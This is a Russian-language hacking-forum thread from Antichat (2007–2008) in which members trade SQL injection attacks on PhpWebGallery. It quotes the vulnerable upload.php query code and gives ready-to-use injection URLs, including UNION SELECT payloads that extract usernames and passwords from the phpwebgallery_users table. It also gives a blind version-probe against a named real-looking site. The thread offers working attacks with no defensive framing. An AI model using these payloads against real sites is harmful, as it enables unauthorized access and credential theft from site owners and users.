Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

28.12.2007, 23:10
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
PhpWebGallery
PhpWebGallery blind sql injection
upload.php
PHP код:
if ( isset( $_POST['submit'] ) and isset( $_GET['waiting_id'] ) )
{
// upload of the thumbnail
$query = 'select file';
$query.= ' from '.WAITING_TABLE;
$query.= ' where id = '.$_GET['waiting_id'];
$query.= ';';
$result= pwg_query( $query );
Выложил ибо там по ходу через админку шелл не залить. Сплоит по той же причине не писал
|
|
|

23.01.2008, 13:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
а кстати какая версия? я там тоже пару скулей видел, 1.3.4 и скорее всего ранние (покрайней мере в 1.3.2 точно есть)
типа такого:
Код:
picture.php?cat=27&image_id=1+union+select+1,2,4,5,5,6,7,8,9,10,11,12,13,14/*&expand=27
при реально существующей картинке вывода нет, а если не существующий image_id, то скрипт отказывается отвечать, т.е. вполне реально провести blind-inj
__________________
Карфаген должен быть разрушен...
|
|
|

23.01.2008, 15:20
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от blackybr
Macro покажи на примере. Я несколько месяцев назад копал, видел это место, не получилось никак. Реакции на параметр вообще не было )
Проблема в том что надо submit послать постом а мне для этого сплоит лень писать. Только что скачал и поставил себе последнюю версию - 1.7.0.
Заменил в коде upload.php в указанном мной месте POST на REQUEST чтобы через GET проканало.
Вот результат.
http://test2.ru/phpwebgallery-1.7.0/upload.php?submit&waiting_id=1'
select file from phpwebgallery_waiting where id = 1\';
[mysql error 1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
А вообще, инъекция работает и при magic_quotes on
blackybr: молодец.. у меня не работало =)
Последний раз редактировалось blackybr; 23.01.2008 в 15:37..
|
|
|

23.01.2008, 15:32
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме: 1214722
Репутация:
676
|
|
Я с пол-,год назад находил этот баг , на милворм не приняли тк нужен эксплоит а писать было лень.
Вот этот код меня обломал сначала , но вскоре я догадался
PHP код:
$file = substr ( $row['file'], 0, strrpos ( $row['file'], ".") );
$extension = get_extension( $_FILES['picture']['name'] );
if (($path = mkget_thumbnail_dir($page['cat_dir'], $error)) != false)
{
$path.= '/'.$conf['prefix_thumbnail'].$file.'.'.$extension;
$result = validate_upload( $path, $conf['upload_maxfilesize'],
upload.php?cat=&waiting_id=-1+union+select+concat_ws(char(46,120,101,107),user name,password)+from+phpwebgallery_users/*
upload.php?cat=&waiting_id=-1+union+select+concat_ws(char(46,120,101,107),pass word,username)+from+phpwebgallery_users/*
Последний раз редактировалось Евгений Минаев; 23.01.2008 в 15:34..
|
|
|

14.09.2008, 22:55
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме: 3509350
Репутация:
412
|
|
-PhpWebGallery 1.3.4 sql injection
-Уязвимость находится в параметре "cat" сценарием picture .
site.co.il/phpwebgallery/picture.php?cat=[Real id]&image_id= [Real id]+and+substring(@@version,1,1)=5
site.co.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@vers ion,1,1)=5
(c)-Насчет копирайтов ей богу непомню где взял .
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|